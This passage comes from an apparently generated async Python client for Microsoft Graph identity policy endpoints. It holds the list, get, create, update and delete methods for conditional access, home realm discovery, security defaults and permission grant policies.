401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_conditional_access_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofconditionalaccesspolicy0', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies'} # type: ignore
async def create_conditional_access_policies(
self,
body: "models.microsoftgraphconditionalaccesspolicy",
**kwargs
) -> "models.microsoftgraphconditionalaccesspolicy":
"""Create new navigation property to conditionalAccessPolicies for policies.
Create new navigation property to conditionalAccessPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphconditionalaccesspolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphconditionalaccesspolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_conditional_access_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphconditionalaccesspolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphconditionalaccesspolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies'} # type: ignore

    async def get_conditional_access_policies(
        self,
        conditional_access_policy_id: str,
        select: Optional[List[Union[str, "models.Enum126"]]] = None,
        expand: Optional[List[str]] = None,
        **kwargs
    ) -> "models.microsoftgraphconditionalaccesspolicy":
        """Get conditionalAccessPolicies from policies.

        Get conditionalAccessPolicies from policies.

        :param conditional_access_policy_id: key: id of conditionalAccessPolicy.
        :type conditional_access_policy_id: str
        :param select: Select properties to be returned.
        :type select: list[str or ~identity_sign_ins.models.Enum126]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: microsoftgraphconditionalaccesspolicy, or the result of cls(response)
        :rtype: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.microsoftgraphconditionalaccesspolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.get_conditional_access_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'conditionalAccessPolicy-id': self._serialize.url("conditional_access_policy_id", conditional_access_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        deserialized = self._deserialize('microsoftgraphconditionalaccesspolicy', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies/{conditionalAccessPolicy-id}'}  # type: ignore

    async def update_conditional_access_policies(
        self,
        conditional_access_policy_id: str,
        body: "models.microsoftgraphconditionalaccesspolicy",
        **kwargs
    ) -> None:
        """Update the navigation property conditionalAccessPolicies in policies.

        Update the navigation property conditionalAccessPolicies in policies.

        :param conditional_access_policy_id: key: id of conditionalAccessPolicy.
        :type conditional_access_policy_id: str
        :param body: New navigation property values.
        :type body: ~identity_sign_ins.models.microsoftgraphconditionalaccesspolicy
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update_conditional_access_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'conditionalAccessPolicy-id': self._serialize.url("conditional_access_policy_id", conditional_access_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'microsoftgraphconditionalaccesspolicy')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})
    update_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies/{conditionalAccessPolicy-id}'}  # type: ignore

    async def delete_conditional_access_policies(
        self,
        conditional_access_policy_id: str,
        if_match: Optional[str] = None,
        **kwargs
    ) -> None:
        """Delete navigation property conditionalAccessPolicies for policies.

        Delete navigation property conditionalAccessPolicies for policies.

        :param conditional_access_policy_id: key: id of conditionalAccessPolicy.
        :type conditional_access_policy_id: str
        :param if_match: ETag.
        :type if_match: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.delete_conditional_access_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'conditionalAccessPolicy-id': self._serialize.url("conditional_access_policy_id", conditional_access_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        if if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})
    delete_conditional_access_policies.metadata = {'url': '/policies/conditionalAccessPolicies/{conditionalAccessPolicy-id}'}  # type: ignore

    def list_home_realm_discovery_policies(
        self,
        orderby: Optional[List[Union[str, "models.Enum127"]]] = None,
        select: Optional[List[Union[str, "models.Enum128"]]] = None,
        expand: Optional[List[Union[str, "models.Enum129"]]] = None,
        **kwargs
    ) -> AsyncIterable["models.collectionofhomerealmdiscoverypolicy"]:
        """Get homeRealmDiscoveryPolicies from policies.

        Get homeRealmDiscoveryPolicies from policies.

        :param orderby: Order items by property values.
        :type orderby: list[str or ~identity_sign_ins.models.Enum127]
        :param select: Select properties to be returned.
        :type select: list[str or ~identity_sign_ins.models.Enum128]
        :param expand: Expand related entities.
        :type expand: list[str or ~identity_sign_ins.models.Enum129]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either collectionofhomerealmdiscoverypolicy or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofhomerealmdiscoverypolicy]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.collectionofhomerealmdiscoverypolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_home_realm_discovery_policies.metadata['url']  # type: ignore
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                if self._config.top is not None:
                    query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
                if self._config.skip is not None:
                    query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
                if self._config.search is not None:
                    query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
                if self._config.filter is not None:
                    query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
                if self._config.count is not None:
                    query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize('collectionofhomerealmdiscoverypolicy', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.odata_next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize(models.odataerror, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies'}  # type: ignore

    async def create_home_realm_discovery_policies(
        self,
        body: "models.microsoftgraphhomerealmdiscoverypolicy",
        **kwargs
    ) -> "models.microsoftgraphhomerealmdiscoverypolicy":
        """Create new navigation property to homeRealmDiscoveryPolicies for policies.

        Create new navigation property to homeRealmDiscoveryPolicies for policies.

        :param body: New navigation property.
        :type body: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: microsoftgraphhomerealmdiscoverypolicy, or the result of cls(response)
        :rtype: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.microsoftgraphhomerealmdiscoverypolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.create_home_realm_discovery_policies.metadata['url']  # type: ignore

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'microsoftgraphhomerealmdiscoverypolicy')
        body_content_kwargs['content'] = body_content
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        deserialized = self._deserialize('microsoftgraphhomerealmdiscoverypolicy', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    create_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies'}  # type: ignore

    async def get_home_realm_discovery_policies(
        self,
        home_realm_discovery_policy_id: str,
        select: Optional[List[Union[str, "models.Enum130"]]] = None,
        expand: Optional[List[Union[str, "models.Enum131"]]] = None,
        **kwargs
    ) -> "models.microsoftgraphhomerealmdiscoverypolicy":
        """Get homeRealmDiscoveryPolicies from policies.

        Get homeRealmDiscoveryPolicies from policies.

        :param home_realm_discovery_policy_id: key: id of homeRealmDiscoveryPolicy.
        :type home_realm_discovery_policy_id: str
        :param select: Select properties to be returned.
        :type select: list[str or ~identity_sign_ins.models.Enum130]
        :param expand: Expand related entities.
        :type expand: list[str or ~identity_sign_ins.models.Enum131]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: microsoftgraphhomerealmdiscoverypolicy, or the result of cls(response)
        :rtype: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.microsoftgraphhomerealmdiscoverypolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.get_home_realm_discovery_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'homeRealmDiscoveryPolicy-id': self._serialize.url("home_realm_discovery_policy_id", home_realm_discovery_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        deserialized = self._deserialize('microsoftgraphhomerealmdiscoverypolicy', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies/{homeRealmDiscoveryPolicy-id}'}  # type: ignore

    async def update_home_realm_discovery_policies(
        self,
        home_realm_discovery_policy_id: str,
        body: "models.microsoftgraphhomerealmdiscoverypolicy",
        **kwargs
    ) -> None:
        """Update the navigation property homeRealmDiscoveryPolicies in policies.

        Update the navigation property homeRealmDiscoveryPolicies in policies.

        :param home_realm_discovery_policy_id: key: id of homeRealmDiscoveryPolicy.
        :type home_realm_discovery_policy_id: str
        :param body: New navigation property values.
        :type body: ~identity_sign_ins.models.microsoftgraphhomerealmdiscoverypolicy
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update_home_realm_discovery_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'homeRealmDiscoveryPolicy-id': self._serialize.url("home_realm_discovery_policy_id", home_realm_discovery_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'microsoftgraphhomerealmdiscoverypolicy')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})
    update_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies/{homeRealmDiscoveryPolicy-id}'}  # type: ignore

    async def delete_home_realm_discovery_policies(
        self,
        home_realm_discovery_policy_id: str,
        if_match: Optional[str] = None,
        **kwargs
    ) -> None:
        """Delete navigation property homeRealmDiscoveryPolicies for policies.

        Delete navigation property homeRealmDiscoveryPolicies for policies.

        :param home_realm_discovery_policy_id: key: id of homeRealmDiscoveryPolicy.
        :type home_realm_discovery_policy_id: str
        :param if_match: ETag.
        :type if_match: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.delete_home_realm_discovery_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'homeRealmDiscoveryPolicy-id': self._serialize.url("home_realm_discovery_policy_id", home_realm_discovery_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        if if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})
    delete_home_realm_discovery_policies.metadata = {'url': '/policies/homeRealmDiscoveryPolicies/{homeRealmDiscoveryPolicy-id}'}  # type: ignore

    async def get_identity_security_defaults_enforcement_policy(
        self,
        select: Optional[List[Union[str, "models.Enum132"]]] = None,
        expand: Optional[List[str]] = None,
        **kwargs
    ) -> "models.microsoftgraphidentitysecuritydefaultsenforcementpolicy":
        """Get identitySecurityDefaultsEnforcementPolicy from policies.

        Get identitySecurityDefaultsEnforcementPolicy from policies.

        :param select: Select properties to be returned.
        :type select: list[str or ~identity_sign_ins.models.Enum132]
        :param expand: Expand related entities.
        :type expand: list[str]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: microsoftgraphidentitysecuritydefaultsenforcementpolicy, or the result of cls(response)
        :rtype: ~identity_sign_ins.models.microsoftgraphidentitysecuritydefaultsenforcementpolicy
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.microsoftgraphidentitysecuritydefaultsenforcementpolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.get_identity_security_defaults_enforcement_policy.metadata['url']  # type: ignore

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        deserialized = self._deserialize('microsoftgraphidentitysecuritydefaultsenforcementpolicy', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get_identity_security_defaults_enforcement_policy.metadata = {'url': '/policies/identitySecurityDefaultsEnforcementPolicy'}  # type: ignore

    async def update_identity_security_defaults_enforcement_policy(
        self,
        body: "models.microsoftgraphidentitysecuritydefaultsenforcementpolicy",
        **kwargs
    ) -> None:
        """Update the navigation property identitySecurityDefaultsEnforcementPolicy in policies.

        Update the navigation property identitySecurityDefaultsEnforcementPolicy in policies.

        :param body: New navigation property values.
        :type body: ~identity_sign_ins.models.microsoftgraphidentitysecuritydefaultsenforcementpolicy
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update_identity_security_defaults_enforcement_policy.metadata['url']  # type: ignore

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'microsoftgraphidentitysecuritydefaultsenforcementpolicy')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})
    update_identity_security_defaults_enforcement_policy.metadata = {'url': '/policies/identitySecurityDefaultsEnforcementPolicy'}  # type: ignore

    async def delete_identity_security_defaults_enforcement_policy(
        self,
        if_match: Optional[str] = None,
        **kwargs
    ) -> None:
        """Delete navigation property identitySecurityDefaultsEnforcementPolicy for policies.

        Delete navigation property identitySecurityDefaultsEnforcementPolicy for policies.

        :param if_match: ETag.
        :type if_match: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.delete_identity_security_defaults_enforcement_policy.metadata['url']  # type: ignore

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        if if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})
    delete_identity_security_defaults_enforcement_policy.metadata = {'url': '/policies/identitySecurityDefaultsEnforcementPolicy'}  # type: ignore

    def list_permission_grant_policies(
        self,
        orderby: Optional[List[Union[str, "models.Enum133"]]] = None,
        select: Optional[List[Union[str, "models.Enum134"]]] = None,
        expand: Optional[List[Union[str, "models.Enum135"]]] = None,
        **kwargs
    ) -> AsyncIterable["models.collectionofpermissiongrantpolicy"]:
        """Get permissionGrantPolicies from policies.

        Get permissionGrantPolicies from policies.

        :param orderby: Order items by property values.
        :type orderby: list[str or ~identity_sign_ins.models.Enum133]
        :param select: Select properties to be returned.
        :type select: list[str or ~identity_sign_ins.models.Enum134]
        :param expand: Expand related entities.
        :type expand: list[str or ~identity_sign_ins.models.Enum135]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either collectionofpermissiongrantpolicy or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionofpermissiongrantpolicy]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.collectionofpermissiongrantpolicy"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        def prepare_request(next_link=None):
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_permission_grant_policies.metadata['url']  # type: ignore
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                if self._config.top is not None:
                    query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
                if self._config.skip is not None:
                    query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
                if self._config.search is not None:
                    query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
                if self._config.filter is not None:
                    query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
                if self._config.count is not None:
                    query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
                if orderby is not None:
                    query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
                if select is not None:
                    query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize('collectionofpermissiongrantpolicy', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
